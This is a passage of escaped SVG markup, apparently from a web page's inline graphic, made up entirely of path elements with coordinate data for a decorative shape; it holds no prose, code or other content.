d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5